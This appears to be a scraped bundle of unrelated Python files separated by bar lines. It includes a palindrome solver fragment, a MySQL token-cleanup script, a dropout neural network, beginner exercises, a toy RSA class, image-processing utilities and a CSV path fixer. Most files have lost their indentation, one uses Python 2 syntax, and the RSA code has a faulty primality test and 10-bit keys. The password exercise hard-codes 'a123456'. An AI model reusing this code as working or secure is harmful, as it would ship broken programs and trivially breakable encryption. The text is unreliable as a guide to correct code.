temp = self.isPalindromicSubstring(s, i, i+1)
if len(res) < len(temp):
res = temp
return res
def isPalindromicSubstring(self, s, i, j):
m = len(s)
while i >= 0 and j <= m-1 and s[i] == s[j]:
i, j = i-1, j+1
return s[i+1:j]
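# A quick sanity check of the expand-around-center approach above (inputs
# chosen only for illustration):
if __name__ == "__main__":
    sol = Solution()
    print(sol.longestPalindrome("babad"))   # "bab" (or "aba"; both are valid)
    print(sol.longestPalindrome("cbbd"))    # "bb"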
|
# encoding=UTF-8
# Clears expired tokens by deleting them from the DB
from dotenv import load_dotenv, find_dotenv
from pathlib import Path
import json
import os
import pymysql
import traceback
import time
import sys
path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(path + "/../")
from reviewgramdb import connect_to_db
def clear_tokens():
path = os.path.dirname(os.path.abspath(__file__))
env_path = Path(path + "/../") / '.env'
load_dotenv(dotenv_path=env_path)
timestamp = int(time.time())
cleanupTime = int(os.getenv("TOKEN_CLEANUP_TIME")) * 60
con = connect_to_db()
with con:
cur = con.cursor()
cur.execute("DELETE FROM `token_to_chat_id` WHERE `TOKEN` IN (SELECT `TOKEN` FROM `token_to_user_id` WHERE " + str(timestamp) + " - TSTAMP >= " + str(cleanupTime) + ")")
con.commit()
cur.close()
cur = con.cursor()
cur.execute("DELETE FROM `token_to_user_id` WHERE " + str(timestamp) + " - TSTAMP >= " + str(cleanupTime))
con.commit()
cur.close()
if __name__== "__main__":
clear_tokens()
|
import jieba, os
from jieba import posseg
jieba.default_logger.setLevel(jieba.logging.INFO)
class WordList(object):
def __init__(self, show_progress=False):
self.show_progress = show_progress
def get(self, file):
if self.show_progress:
print('reading: %s' % file)
try:
with open(file, 'r') as f:
txt = f.read()
except UnicodeDecodeError:
try:
with open(file, 'r', encoding='gb2312') as f:
txt = f.read()
except UnicodeDecodeError:
if self.show_progress:
print('decode error, skipping: %s' % file)
txt = ''
return posseg.cut(txt)
def get_from_list(self, file_list):
word_list = []
for f in file_list:
if os.path.exists(f):
if os.path.isdir(f):
l = map(lambda x: f + '/' + x, os.listdir(f))
w = self.get_from_list(l)
if w:
word_list += w
else:
return []
elif f.endswith('.txt'):
word_list += self.get(f)
else:
if self.show_progress:
print('file "%s" does not exist' % f)
return []
return word_list
if __name__ == '__main__':
pass
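    # A minimal usage sketch; 'corpus' below is a hypothetical directory of
    # .txt files, so point it at real data before running.
    wl = WordList(show_progress=True)
    for word, flag in wl.get_from_list(['corpus']):
        print('%s/%s' % (word, flag))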
|
# ###############################
# Michael Vassernis - 319582888
#
#################################
import numpy as np
from helper_functions import softmax
class NNModel(object):
def __init__(self, dims):
self.loss_data = []
self.dims = dims
self.params = []
for i in range(0, len(dims) - 1):
# using sqrt(6) parameters initialization (Optimal according to an old ML paper)
r_w = np.sqrt(6) / np.sqrt(dims[i] + dims[i + 1])
r_b = np.sqrt(6) / np.sqrt(dims[i + 1] + 1)
w = np.random.uniform(-r_w, r_w, (dims[i], dims[i + 1]))
b = np.random.uniform(-r_b, r_b, dims[i + 1])
self.params.append(w)
self.params.append(b)
self.num_params = len(self.params)
def add_loss_data(self, loss):
self.loss_data.append(loss)
def feed_forward(self, input_vec):
curr_layer = input_vec
for i in range(0, self.num_params - 2, 2):
# new layer = old layer * W + b
curr_layer = np.dot(curr_layer, self.params[i]) + self.params[i + 1]
# non linearity
curr_layer = np.tanh(curr_layer)
curr_layer = np.dot(curr_layer, self.params[-2]) + self.params[-1]
# curr_layer = softmax(curr_layer)
return curr_layer
def predict(self, input_vec):
return np.argmax(self.feed_forward(input_vec))
def loss_and_gradients(self, input_vec, y_true, hidden_dropout, input_dropout):
hidden_layers = []
dropouts = []
hidden_layers_tanh = [input_vec * np.random.binomial(1, 1.0 - input_dropout, size=input_vec.shape)]
keep = 1.0 - hidden_dropout
scale = 1.0 / keep
for i in range(0, self.num_params - 2, 2):
            hidden_layers.append(np.dot(hidden_layers_tanh[i // 2], self.params[i]) + self.params[i + 1])
dropout = np.random.binomial(1, keep, size=hidden_layers[-1].shape) * scale
dropouts.append(dropout)
hidden_layers_tanh.append(np.tanh(hidden_layers[-1]) * dropout)
y_hat = np.dot(hidden_layers_tanh[len(hidden_layers_tanh) - 1], self.params[-2]) + self.params[-1]
y_hat = softmax(y_hat)
loss = - np.log(y_hat[int(y_true)])
d_loss_d_out = y_hat
d_loss_d_out[int(y_true)] -= 1
grads = []
for t in range(0, len(hidden_layers_tanh)):
index = len(hidden_layers_tanh) - 1 - t
g_b = d_loss_d_out
g_w = np.outer(hidden_layers_tanh[index], d_loss_d_out)
grads.insert(0, g_b)
grads.insert(0, g_w)
if index > 0:
d_loss_d_hidden_act = np.dot(self.params[index * 2], d_loss_d_out)
d_drop_out_loss = dropouts[index - 1]
d_hidden_act_d_hidden = 1 - np.tanh(hidden_layers[index - 1]) ** 2
d_loss_d_out = d_loss_d_hidden_act * d_hidden_act_d_hidden * d_drop_out_loss
return loss, grads
def train_on_example(self, input_vec, y_true, learning_rate, regularization):
loss, grads = self.loss_and_gradients(input_vec, y_true, 0.4, 0.1)
for i in range(0, self.num_params):
# update the parameters with gradients, and add L2 regularization
self.params[i] -= learning_rate * (grads[i] + self.params[i] * regularization)
return loss
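# A minimal smoke test on random data; the layer sizes and hyper-parameters
# below are arbitrary illustrations, not values from the original assignment
# (it also assumes helper_functions.softmax is available, as imported above).
if __name__ == "__main__":
    np.random.seed(0)
    model = NNModel([20, 16, 4])   # 20 inputs, one hidden layer of 16, 4 classes
    x = np.random.randn(20)
    for _ in range(5):
        loss = model.train_on_example(x, y_true=2, learning_rate=0.01, regularization=1e-4)
        model.add_loss_data(loss)
    print("final loss:", loss, "predicted class:", model.predict(x))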
|
a = float(input('Altura da parede: '))
l = float(input('Largura da parede: '))
m2 = a * l
t = m2 / 2
print('Com a área da parede sendo de {}m², é necessário {:.1f}L para pintar'.format(m2, t))
|
import math
n = []
li = []
li = [i for i in range(2,10000)]
while li[0] <= int(math.sqrt(10000)):
n.append(li[0])
sss = li[0]
li = [i for i in li if i % sss != 0]
n.extend(li)
while True:
ans = 0
x = int(input())
if x == 0: break
for i in range(x):
ans += n[i]
print(ans)
|
for x in range(1,10):
for y in range(1,10):
ans = x * y
print(str(x) +'x'+ str(y) +'='+ str(ans))
|
class PlotData:
    def __init__(self, name, title, source, expression, selection, labels):
        self.name = name
        self.title = title
self.source = source
self.expression = expression
self.selection = selection
self.labels = labels
|
#class NoneRelase(Exception):
'''
author: Vaclav
implementation of the RSA encryption algorithm
'''
import random
import math
class rsa:
_word = ''
bitSize = 10
e = 29
n=0
d=0
    def __init__(self, word=''):
        # a single constructor with a default argument replaces the two
        # duplicate __init__ definitions (Python keeps only the last one)
        self.word = word
def _textToint(self,word):
'''
        Converts text into the corresponding ascii & unicode numeric code.
        Only tested on ascii.
>>> a = rsa();a._textToint('hello world')
104101108108111032119111114108100
'''
s = [ord(x) for x in word]
s = ''.join(map(lambda x: [str(x),"0"+str(x)][x<100] ,s) )#если код <100 подставить 0 в начало
s = int(s)
return s
def _intToText(self, intcode):
'''
        Converts a numeric code back into characters.
'''
intcode = str(intcode)
ptr=0
buf = ''
result = ''
for x in range(len(intcode)):
buf+=intcode[x]
ptr+=1
if ptr==3:
ptr=0
result+=chr(int(buf))
buf=''
return result
def encode(self, inword):
self.intcode = self._textToint(inword)
return self.binpow(self.intcode, self.e, self.n)
#return "encode was note define"
def decode(self, output):
text = self.binpow(output, self.d, self.n)
print('decode: ',text)
text = self._intToText(text)
return text
    def binpow(self, a, x, mod):
        # fast modular exponentiation: (a ** x) % mod, with integer arithmetic
        res = 1
        a %= mod
        while x:
            if x & 1:
                res *= a
                res %= mod
            a *= a
            a %= mod
            x //= 2
        return res
def rabin_miller(self, m=bitSize, r=10):
if (m == 2):
return True
if ((m < 2) or (m % 2 == 0)):
return False
p = 0
q = m-1
        # factor out powers of two: m - 1 = q * 2**p with q odd
        while q % 2 == 0:
            q //= 2
p += 1
        # loop A
while (r):
            x = random.randint(2, m-1)  # random witness from the range
            x = self.binpow(x, q, m)    # x = x**q mod m
if (x == 1 or x == m-1):
return True
            # loop B
for i in range(0,p):
x = (x * x) % m
if (x == m-1):
break
else:
return False
p -= 1
r -= 1
return True
def _primeGenerator(self,bitSize):
        '''Generates a random prime number of the given bit length.
'''
start = 2**(bitSize-1)
end = 2**bitSize - 1
ptr = 0
while (1):
prime = random.randint(start, end)
ptr+=1
#print(ptr)
if self.rabin_miller(prime):
return prime
    def gcdExt(self, a, b):
        '''
        Extended Euclidean algorithm.
        Returns the tuple (d, x, y) where d = gcd(a, b) and
        ax + by = gcd(a, b)
        '''
        x = y = d = 0
        if b == 0:
            x = 1
            y = 0
            return a, x, y
        d, x, y = self.gcdExt(b, a % b)
        x, y = y, x - (a // b) * y
        return d, x, y
    def keyGenerator(self):
        while 1:
            p = self._primeGenerator(self.bitSize)  # generate p  .1
            q = self._primeGenerator(self.bitSize)  # generate q  .1
            self.n = p * q                          # .2
            phi_n = (p-1) * (q-1)                   # .3
            if p != q and phi_n > self.e and phi_n % self.e != 0:  # .4
                break
        # d must be the modular inverse of e modulo phi(n); math.pow(e, -1)
        # is an ordinary reciprocal and produces a broken key, so use the
        # extended Euclidean algorithm instead.
        g, x, _ = self.gcdExt(self.e, phi_n)
        self.d = x % phi_n
        # e, n - public key, d - private key
        print(self.n, self.d)
'''
1) known issue: decode returned 1 when d was not computed as a true modular inverse (see keyGenerator)
'''
def main():
myrsa = rsa()
print(myrsa._textToint("hello world"))
print(myrsa.rabin_miller(21, 3))
myrsa.keyGenerator()
print('hello: ',myrsa.encode("he"))
print("dehello:",myrsa.decode(myrsa.encode("he")))
if __name__ == "__main__":
main()
import doctest
doctest.testmod()
|
import sys, os, re
def convertToBinaryData(filename):
with open(filename, 'rb') as file:
binaryData = file.read()
return binaryData
directory_name = os.path.dirname(sys.argv[0])
l = [] ## initialize few lists which we will later use
oid = 0 #.
img_id = [] #.
cat_img_name =[] #.
img_type = [] #.
img_res = [] #.
img_name = [] #.
img_size = [] #.
blob_data = [] #.
x = [] #.
y = [] #.
z = [] ##
img_res_val = "960x540"
img_type_val = "png"
for subdir, dirs, files in os.walk(directory_name):
for file in files:
filepath = subdir + os.sep + file
cat_img = filepath.replace(subdir, "")
cat_img_name.append(cat_img)
img_res.append(img_res_val)
img_type.append(img_type_val)
img_name.append(cat_img.replace(".png",""))
img_size.append(os.path.getsize(filepath))
blob_data.append(convertToBinaryData(filepath))
e = re.findall("X\d+.", filepath) # find the x degree using regex
qewg=e[0].replace("X","").replace("_", "")
x.append(qewg)
e = re.findall("Y\d+.", filepath) # find the y degree using regex
qewg=e[0].replace("Y","").replace("_", "")
y.append(qewg)
e = re.findall("Z\d+.", filepath) # find the z degree using regex
qewg=e[0].replace("Z","").replace("_", "")
z.append(qewg)
oid = oid + 1
#print(oid)
img_id.append(oid)
data = {
"image_id" : img_id,
"image_name": img_name,
"image_size": img_size,
"image_reso": img_res, # create a data dictonary with all the lists
"image_type": img_type,
"image_BLOB": blob_data,
"X" : x,
"Y" : y,
"Z" : z,
}
import pandas as pd
dataFrame = pd.DataFrame(data) # convert data dictonary into a dataframe
dataFrame.to_csv('final.csv',encoding='utf-8') # export the dataFrame into a csv
|
"""
Contains code for score calculation and other tasks to be excuted on images
"""
from cv2 import imread, line, bitwise_and
import numpy as np
def find_mean_color(img, on_pixels = -1):
"""
Returns mean color of an image (in B, G, R).
If on_pixels are provided (non negative), then the total color is divided by this value instead of total pixels in image. This is used for calculating color of a path.
"""
if on_pixels == -1:
pixels = img.shape[0] * img.shape[1]
else:
pixels = on_pixels
mean_blue = int(np.sum(img[:, :, 0]) / pixels)
mean_green = int(np.sum(img[:, :, 1]) / pixels)
mean_red = int(np.sum(img[:, :, 2])/ pixels)
return (mean_blue, mean_green, mean_red)
def make_mask(points_array, shape = (400, 600, 3)):
"""
Returns the mask made by using the points provided from the player.
The mask consists of lines drawn by the player and is used for calculating the score.
Also returns the number of "on" pixels (pixels with white color)
"""
number_of_points = len(points_array)
mask = np.zeros(shape)
for i in range(number_of_points - 1):
line(mask, points_array[i], points_array[i+1], (255, 255, 255), 20)
total_white_color = np.sum(mask[:, :, 0])
total_on_pixels = int(total_white_color / 255.0)
return mask, total_on_pixels
def find_score(level_id, points):
"""
Calculates the score by taking the level_id and points.
"""
fileref = "app/controls/levels/" + str(level_id) + ".jpg"
level_img = imread(fileref)
mask, on_pixels = make_mask(points, shape = level_img.shape)
mask = np.array(mask, dtype = np.uint8)
result = bitwise_and(level_img, mask)
level_mean = find_mean_color(level_img)
solution_mean = find_mean_color(result, on_pixels = on_pixels)
score = 0.0
for x in range(3):
score += (level_mean[x] - solution_mean[x]) ** 2
score = int(np.sqrt(score))
print "score is : " + str(score)
return score
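# A small self-contained check of the helpers above: draw a short stroke on a
# blank canvas and inspect it (the points are arbitrary illustration values).
if __name__ == "__main__":
    sample_points = [(50, 50), (200, 150), (350, 300)]
    mask, on_pixels = make_mask(sample_points)
    print("on pixels: " + str(on_pixels))
    print("mean mask color (B, G, R): " + str(find_mean_color(mask, on_pixels=on_pixels)))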
|
pw = 'a123456'
i = 3
while i > 0:
i = i - 1
password = input('請輸入密碼:')
if password == pw:
print('登入成功')
break
else:
print('密碼錯誤!')
if i > 0:
print('還有', i , '次機會')
else:
print('您已錯誤三次,請重設密碼!')
|
import numpy as np
from scipy.spatial import Delaunay
from .utils import fix
from .affine import affine_matrix
class MultiAffine:
def __init__(self, origin_points, new_points, triangulation=None):
for p in [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]:
assert(p in origin_points)
assert(p in new_points)
if triangulation is None:
triangulation = Delaunay(new_points)
self.origin_points = np.array(origin_points)
self.new_points = np.array(new_points)
self.triangulation = triangulation
self.affines = []
for triangle in triangulation.simplices:
mat1 = affine_matrix(*self.origin_points[triangle])
mat2 = affine_matrix(*self.new_points[triangle])
affine = np.matmul(np.linalg.inv(mat2), mat1)
self.affines.append(affine)
def __call__(self, x, y, origin_width, origin_height, new_width, new_height):
nx = x / new_width
ny = y / new_height
index = self.triangulation.find_simplex((nx, ny))
assert(index != -1)
nx, ny, z = np.matmul(np.array([nx, ny, 1]), self.affines[index])
# print(x, y, nx / z * origin_width, ny / z * origin_height)
return fix(nx / z * origin_width, ny / z * origin_height, origin_width, origin_height)
|
# Convert a person's weight from pounds (lbs) to kilograms: the value in lbs is multiplied by 0.45
weight_lbs=input("Weight lbs= ")
weight_kg=int(weight_lbs)*0.45
print(weight_kg)
|
import xml.etree.ElementTree as ET
|
"""
Fix the path issues in the log files.
This is for the preparation of running batch training
"""
import pandas as pd
import os
def update_df(log_file_dir):
"""
Update the file directory of each image file in driving_log.csv.
This function returns a new dataframe that has the same form as driving_log.csv.
The file name of each image file becomes: log_file_dir/IMG/XXXXXX.JPG
:param log_file_dir: the new file directory.
:return: the new dataframe
"""
def change_dir(x):
file_dir, fname = os.path.split(x)
return os.path.join(log_file_dir, 'IMG/', fname)
    df = pd.read_csv(os.path.join(log_file_dir, 'driving_log.csv'), header=0, index_col=None)
ndf = df[['center', 'left', 'right']]
ndf = ndf.applymap(change_dir)
df[['center', 'left', 'right']] = ndf
return df
if __name__ == "__main__":
file_dir = './data/official_baseline/'
df = update_df(file_dir)
df.to_csv('new_log_file.csv', index=None)
|